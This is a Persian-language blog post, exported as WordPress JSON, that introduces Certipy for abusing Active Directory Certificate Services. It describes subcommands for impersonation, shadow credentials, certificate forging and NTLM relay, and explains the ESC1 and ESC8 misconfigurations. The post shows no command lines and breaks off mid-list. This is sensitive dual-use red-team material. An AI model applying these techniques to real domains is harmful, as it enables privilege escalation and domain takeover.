{"id":19879,"date":"2025-07-15T09:30:42","date_gmt":"2025-07-15T06:00:42","guid":{"rendered":"https:\/\/liangroup.net\/blog\/?p=19879"},"modified":"2025-07-14T21:51:03","modified_gmt":"2025-07-14T18:21:03","slug":"a-detailed-guide-on-certipy","status":"publish","type":"post","link":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/","title":{"rendered":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy"},"content":{"rendered":"

\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong> Active Directory <\/strong>\u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong> Certipy<\/strong><\/span><\/p>\n

\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645. \u0686\u0647 \u062f\u0631 \u062d\u0627\u0644 \u0647\u062f\u0641\u200c\u06af\u06cc\u0631\u06cc \u0628\u0631\u062f\u0627\u0631\u0647\u0627\u06cc \u062d\u0645\u0644\u0647 ESC1 \u062a\u0627 ESC16 \u0628\u0627\u0634\u06cc\u062f \u0648 \u0686\u0647 \u062f\u0631 \u062d\u0627\u0644 \u062c\u0639\u0644 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0628\u0631\u0627\u06cc \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632 \u062f\u0633\u062a\u0631\u0633\u06cc \u0648 \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc\u060c \u0627\u06cc\u0646 \u0645\u0642\u0627\u0644\u0647 \u0634\u0645\u0627 \u0631\u0627 \u06af\u0627\u0645 \u0628\u0647 \u06af\u0627\u0645 \u0627\u0632 \u0645\u0631\u0627\u062d\u0644 \u0636\u0631\u0648\u0631\u06cc\u060c \u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u062a\u0627 \u0628\u0647\u200c\u062f\u0633\u062a \u0622\u0648\u0631\u062f\u0646 \u062a\u0627\u06cc\u06cc\u062f \u0647\u0648\u06cc\u062a \u062f\u0627\u0645\u0646\u0647\u060c \u0631\u0627\u0647\u0646\u0645\u0627\u06cc\u06cc \u062e\u0648\u0627\u0647\u062f \u06a9\u0631\u062f.<\/span><\/p>\n

\u0641\u0647\u0631\u0633\u062a \u0645\u0637\u0627\u0644\u0628<\/strong><\/span><\/p>\n

    \n
  1. \u0645\u0631\u0648\u0631\u06cc \u0628\u0631<\/strong> Certipy<\/strong><\/span><\/li>\n
  2. \u0645\u0641\u0627\u0647\u06cc\u0645 \u06a9\u0644\u06cc\u062f\u06cc<\/strong> ADCS<\/strong><\/span><\/li>\n
  3. \u0645\u0642\u062f\u0645\u0627\u062a<\/strong><\/span><\/li>\n
  4. \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631<\/strong><\/span><\/li>\n
  5. \u0628\u0631\u0631\u0633\u06cc \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u062d\u0633\u0627\u0628<\/strong><\/span><\/li>\n
  6. \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u062d\u0633\u0627\u0628\u200c\u0647\u0627<\/strong><\/span><\/li>\n
  7. \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627<\/strong><\/span><\/li>\n
  8. \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0627\u0632 \u0637\u0631\u06cc\u0642 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647<\/strong><\/span><\/li>\n
  9. \u0645\u062f\u06cc\u0631\u06cc\u062a \u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646<\/strong><\/span><\/li>\n
  10. \u062a\u063a\u06cc\u06cc\u0631 \u0627\u0644\u06af\u0648\u0647\u0627 \u0648<\/strong> CA<\/strong><\/span><\/li>\n
  11. \u062c\u0639\u0644 \u0648 \u0631\u0644\u0647 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627<\/strong><\/span><\/li>\n
  12. \u0645\u0642\u0627\u0628\u0644\u0647 \u0628\u0627 \u062a\u0647\u062f\u06cc\u062f\u0627\u062a<\/strong><\/span><\/li>\n<\/ol>\n

    \u0645\u0631\u0648\u0631\u06cc \u0628\u0631<\/strong> Certipy<\/strong><\/span><\/p>\n

    Certipy \u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u062a\u062e\u0635\u0635\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0636\u0639\u0641\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory Certificate Services (ADCS) \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a. \u062f\u0631 \u062d\u0627\u0644\u06cc \u06a9\u0647 ADCS \u0646\u0642\u0634 \u062d\u06cc\u0627\u062a\u06cc \u062f\u0631 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0648 \u0631\u0645\u0632\u0646\u06af\u0627\u0631\u06cc \u062f\u0631 \u0645\u062d\u06cc\u0637\u200c\u0647\u0627\u06cc \u0648\u06cc\u0646\u062f\u0648\u0632 \u062f\u0627\u0631\u062f\u060c \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0628\u06cc\u0634 \u0627\u0632 \u062d\u062f \u062f\u0633\u062a\u0631\u0633\u06cc\u200c\u067e\u0630\u06cc\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0622\u0646 \u0631\u0627 \u0628\u0647 \u06cc\u06a9 \u0628\u0631\u062f\u0627\u0631 \u062d\u0645\u0644\u0647 \u0628\u0627 \u062a\u0623\u062b\u06cc\u0631 \u0628\u0627\u0644\u0627 \u062a\u0628\u062f\u06cc\u0644 \u06a9\u0646\u0646\u062f.<\/span><\/p>\n

    \u062d\u0645\u0644\u0647\u200c\u06a9\u0646\u0646\u062f\u06af\u0627\u0646 \u0648 \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u0642\u0631\u0645\u0632 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 Certipy \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u06cc\u0646 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a\u060c \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a\u060c \u062c\u0639\u0644 \u0647\u0648\u06cc\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0648 \u062f\u0633\u062a\u0631\u0633\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631 \u0628\u0647 \u062f\u0627\u0645\u0646\u0647 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f. \u0627\u06cc\u0646 \u0627\u0645\u0631 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0645\u0633\u06cc\u0631\u0647\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0646\u0627\u062e\u062a\u0647 \u0634\u062f\u0647\u200c\u0627\u06cc \u06a9\u0647 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0628\u0647 \u0635\u0648\u0631\u062a ESC1 \u062a\u0627 ESC16 \u062f\u0633\u062a\u0647\u200c\u0628\u0646\u062f\u06cc \u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u0642\u0627\u0628\u0644 \u0627\u0646\u062c\u0627\u0645 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0645\u0633\u06cc\u0631\u0647\u0627 \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u062e\u0627\u0635 \u062f\u0631 \u0637\u0631\u0627\u062d\u06cc \u0627\u0644\u06af\u0648\u0647\u0627\u060c \u0645\u062c\u0648\u0632\u0647\u0627 \u0648 \u0645\u062f\u0644\u200c\u0647\u0627\u06cc \u0627\u0639\u062a\u0645\u0627\u062f CA \u0647\u0633\u062a\u0646\u062f.<\/span><\/p>\n

    \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0648 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc \u06a9\u0644\u06cc\u062f\u06cc<\/strong> Certipy<\/strong><\/span><\/p>\n

    Certipy \u0627\u0632 \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u06cc \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0647\u0631 \u06a9\u062f\u0627\u0645 \u0628\u0647 \u0645\u0633\u06cc\u0631\u0647\u0627\u06cc \u062e\u0627\u0635 \u062d\u0645\u0644\u0647 \u062f\u0631 ADCS \u0627\u062e\u062a\u0635\u0627\u0635 \u062f\u0627\u0631\u0646\u062f:<\/span><\/p>\n

      \n
    • find<\/strong> \u2013 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc AD CS \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0631\u062f\u0647 \u0648 \u0645\u0631\u0627\u062c\u0639 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u060c \u0627\u0644\u06af\u0648\u0647\u0627 \u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0627\u062d\u062a\u0645\u0627\u0644\u06cc ESC \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n
    • account<\/strong> \u2013 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631 \u06cc\u0627 \u0631\u0627\u06cc\u0627\u0646\u0647 \u0631\u0627 \u0628\u0631\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0645\u062f\u06cc\u0631\u06cc\u062a \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u062a\u0646\u0638\u06cc\u0645 SPN\u200c\u0647\u0627\u060c UPN\u200c\u0647\u0627 \u0648 \u0627\u06cc\u062c\u0627\u062f \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a \u067e\u06cc\u0686\u06cc\u062f\u0647 \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647.<\/span><\/li>\n
    • req<\/strong> \u2013 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc \u0627\u0632 \u06cc\u06a9 CA\u060c \u062a\u0639\u06cc\u06cc\u0646 \u0627\u0644\u06af\u0648 \u0648 \u0646\u0627\u0645 CA\u060c \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646\u060c \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u06cc \u0627\u0632 RPC\u060c DCOM \u06cc\u0627 HTTP(S) \u0648 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 certipy req \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627 \u0628\u0647 \u0645\u0646\u0638\u0648\u0631 \u062c\u0639\u0644 \u0647\u0648\u06cc\u062a.<\/span><\/li>\n
    • auth<\/strong> \u2013 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 (PFX) \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u062f\u0627\u0645\u0646\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 Kerberos PKINIT \u06cc\u0627 Schannel \u0628\u0647 LDAP\u060c \u062f\u0631\u06cc\u0627\u0641\u062a TGT \u0648 \u0647\u0634 NTLM.<\/span><\/li>\n
    • shadow<\/strong> \u2013 \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0647 \u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646 \u0628\u0631\u0627\u06cc \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 \u0627\u0639\u062a\u0628\u0627\u0631 \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0631\u0648\u06cc \u06cc\u06a9 \u06a9\u0627\u0631\u0628\u0631\u060c \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0627\u0632 \u0637\u0631\u06cc\u0642 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n
    • Template<\/strong> \u2013 \u0645\u062f\u06cc\u0631\u06cc\u062a \u0627\u0634\u06cc\u0627\u0621 \u0627\u0644\u06af\u0648\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u062f\u0631 AD\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u0627\u0633\u062a\u062e\u0631\u0627\u062c\u060c \u062a\u063a\u06cc\u06cc\u0631 \u0648 \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0627\u0644\u06af\u0648\u060c \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f ESC4 \u0645\u0641\u06cc\u062f \u0627\u0633\u062a.<\/span><\/li>\n
    • ca<\/strong> \u2013 \u0645\u062f\u06cc\u0631\u06cc\u062a \u062a\u0646\u0638\u06cc\u0645\u0627\u062a CA \u0628\u0631\u0627\u06cc \u0641\u0639\u0627\u0644\/\u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u06a9\u0631\u062f\u0646 \u0627\u0644\u06af\u0648\u0647\u0627\u060c \u062a\u0627\u06cc\u06cc\u062f\/\u0631\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627 \u0648 \u0627\u0641\u0632\u0648\u062f\u0646\/\u062d\u0630\u0641 \u0645\u062f\u06cc\u0631\u0627\u0646 CA.<\/span><\/li>\n
    • forge<\/strong> \u2013 \u062c\u0639\u0644 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u0644\u06cc\u062f \u062e\u0635\u0648\u0635\u06cc \u06cc\u06a9 CA \u0646\u0641\u0648\u0630\u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0627\u06cc\u062c\u0627\u062f \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062f\u0644\u062e\u0648\u0627\u0647\u060c \u06a9\u0647 \u0628\u0631\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0645\u0641\u06cc\u062f \u0627\u0633\u062a \u0627\u06af\u0631 \u06cc\u06a9 CA \u0631\u06cc\u0634\u0647 \u06cc\u0627 \u062a\u062d\u062a\u200c\u0627\u0644\u062a\u062d\u0627\u0642 \u0646\u0641\u0648\u0630 \u06a9\u0631\u062f\u0647 \u0628\u0627\u0634\u062f.<\/span><\/li>\n
    • relay<\/strong> \u2013 \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0647 NTLM relay targeting \u0628\u0647 \u0648\u0627\u0633\u0637\u0647 \u0646\u0642\u0627\u0637 \u067e\u0627\u06cc\u0627\u0646\u06cc AD CS HTTP(S) \u06cc\u0627 RPC \u0628\u0631\u0627\u06cc \u062f\u0631\u06cc\u0627\u0641\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0635\u0627\u062f\u0631 \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0642\u0631\u0628\u0627\u0646\u06cc\u060c \u06a9\u0647 \u062d\u0645\u0644\u0627\u062a ESC8 \u0648 ESC11 \u0631\u0627 \u0628\u0647 \u0637\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u062f\u0647\u062f.<\/span><\/li>\n<\/ul>\n

      \u0686\u0631\u0627 \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627 \u06a9\u0627\u0631 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f\u061f<\/strong><\/span><\/p>\n

      \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627 \u0628\u0647 \u062c\u0627\u06cc \u0627\u062a\u06a9\u0627 \u0628\u0647 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u062f\u060c \u0628\u0631 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0639\u062a\u0645\u0627\u062f \u0648 \u0633\u06cc\u0627\u0633\u062a\u200c\u0647\u0627\u06cc \u0636\u0639\u06cc\u0641 \u062a\u06a9\u06cc\u0647 \u062f\u0627\u0631\u0646\u062f:<\/span><\/p>\n

        \n
      • \u0627\u0639\u062a\u0645\u0627\u062f<\/strong> CA <\/strong>\u0628\u0647 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a\u060c \u0646\u0647 \u0647\u0648\u06cc\u062a \u0648\u0627\u0642\u0639\u06cc<\/strong> \u2013 \u0627\u06af\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0645\u0639\u062a\u0628\u0631 \u0628\u0647 \u0646\u0638\u0631 \u0628\u0631\u0633\u062f\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0627\u06cc \u0628\u0647 \u062d\u0645\u0644\u0647\u200c\u06a9\u0646\u0646\u062f\u0647 \u0635\u0627\u062f\u0631 \u0634\u0648\u062f.<\/span><\/li>\n
      • \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0627\u0644\u06af\u0648\u0647\u0627<\/strong> \u2013 \u0627\u062c\u0627\u0632\u0647 \u0628\u0647 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0634\u062a\u0631\u06cc \u0648 \u06a9\u0646\u062a\u0631\u0644 SAN\u060c \u06a9\u0647 \u0645\u0648\u062c\u0628 \u062c\u0639\u0644 \u0647\u0648\u06cc\u062a \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/li>\n
      • \u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646<\/strong> \u2013 \u0648\u0627\u0631\u062f \u06a9\u0631\u062f\u0646 \u0627\u0639\u062a\u0628\u0627\u0631\u0647\u0627\u06cc \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0628\u0647 \u0635\u0648\u0631\u062a \u067e\u0646\u0647\u0627\u0646\u06cc\u060c \u06a9\u0647 \u0627\u0632 \u0639\u0628\u0648\u0631 \u0627\u0632 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0648 MFA \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/li>\n
      • \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u060c \u0639\u0628\u0648\u0631 \u0627\u0632 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631<\/strong> \u2013 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0648\u0631\u0648\u062f \u062f\u0627\u0645\u0646\u0647 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0647\u062f\u0641.<\/span><\/li>\n
      • \u0646\u0642\u0634\u200c\u0647\u0627\u06cc \u0642\u062f\u0631\u062a\u0645\u0646\u062f<\/strong> CA<\/strong> \u2013 \u0627\u0641\u0633\u0631\u0627\u0646 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0648 \u0645\u062f\u06cc\u0631\u0627\u0646 CA \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0628\u0631\u0627\u06cc \u0647\u0631 \u06a9\u0633\u06cc \u0635\u0627\u062f\u0631 \u06a9\u0646\u0646\u062f \u06a9\u0647 \u062e\u0637\u0631 \u062a\u0635\u0627\u062d\u0628 \u062f\u0627\u0645\u0646\u0647 \u0631\u0627 \u0628\u0647 \u0647\u0645\u0631\u0627\u0647 \u062f\u0627\u0631\u062f.<\/span><\/li>\n<\/ul>\n

        \u0645\u0641\u0627\u0647\u06cc\u0645 \u06a9\u0644\u06cc\u062f\u06cc<\/strong> ADCS<\/strong><\/span><\/p>\n

        ADCS \u06cc\u06a9 \u0633\u062a\u0648\u0646 \u0641\u0642\u0631\u0627\u062a \u0628\u0631\u0627\u06cc \u062a\u0623\u06cc\u06cc\u062f \u0647\u0648\u06cc\u062a \u0648 \u0627\u0631\u062a\u0628\u0627\u0637\u0627\u062a \u0627\u0645\u0646 \u0627\u0633\u062a (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644 \u06a9\u0627\u0631\u062a\u200c\u0647\u0627\u06cc \u0647\u0648\u0634\u0645\u0646\u062f\u060c TLS\u060c \u062f\u0633\u062a\u0631\u0633\u06cc VPN\u060c \u0631\u0645\u0632\u0646\u06af\u0627\u0631\u06cc \u0627\u06cc\u0645\u06cc\u0644) \u0648 \u0647\u0645\u0686\u0646\u06cc\u0646 \u0647\u062f\u0641 \u0627\u0631\u0632\u0634\u0645\u0646\u062f\u06cc \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0647\u200c\u06a9\u0646\u0646\u062f\u06af\u0627\u0646 \u0627\u0633\u062a. \u0632\u06cc\u0631\u0627 ADCS \u0628\u0647 \u0637\u0648\u0631 \u0639\u0645\u06cc\u0642 \u0628\u0627 Active Directory \u06cc\u06a9\u067e\u0627\u0631\u0686\u0647 \u0627\u0633\u062a \u0648 \u062f\u0631 \u0633\u0631\u0627\u0633\u0631 \u062f\u0627\u0645\u0646\u0647 \u0628\u0647 \u0637\u0648\u0631 \u0636\u0645\u0646\u06cc \u0628\u0647 \u0622\u0646 \u0627\u0639\u062a\u0645\u0627\u062f \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n

        \u0686\u0631\u0627<\/strong> ADCS <\/strong>\u06cc\u06a9 \u0633\u0637\u062d \u062d\u0645\u0644\u0647 \u0627\u0633\u062a\u061f<\/strong><\/span><\/p>\n

        \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u062f\u0631 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u06cc\u0627 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a CA \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062d\u0645\u0644\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u06cc \u0631\u0627 \u0641\u0639\u0627\u0644 \u06a9\u0646\u062f:<\/span><\/p>\n

          \n
        • \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647<\/strong>: \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0627\u0644\u06af\u0648\u0647\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632 \u067e\u0627\u06cc\u06cc\u0646 \u0627\u062c\u0627\u0632\u0647 \u062f\u0647\u062f \u062a\u0627 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0628\u0631\u0627\u06cc \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632 \u0628\u0627\u0644\u0627 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06a9\u0646\u0646\u062f (ESC1).<\/span><\/li>\n
        • \u062b\u0628\u062a\u200c\u0646\u0627\u0645 \u0648\u0628<\/strong>: \u0627\u0641\u0634\u0627\u06cc \u0631\u0627\u0628\u0637 AD CS (\/certsrv) \u0627\u0632 \u0637\u0631\u06cc\u0642 HTTP \u0628\u0627 NTLM \u0641\u0639\u0627\u0644 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a NTLM relay \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0648\u062f (ESC8).<\/span><\/li>\n
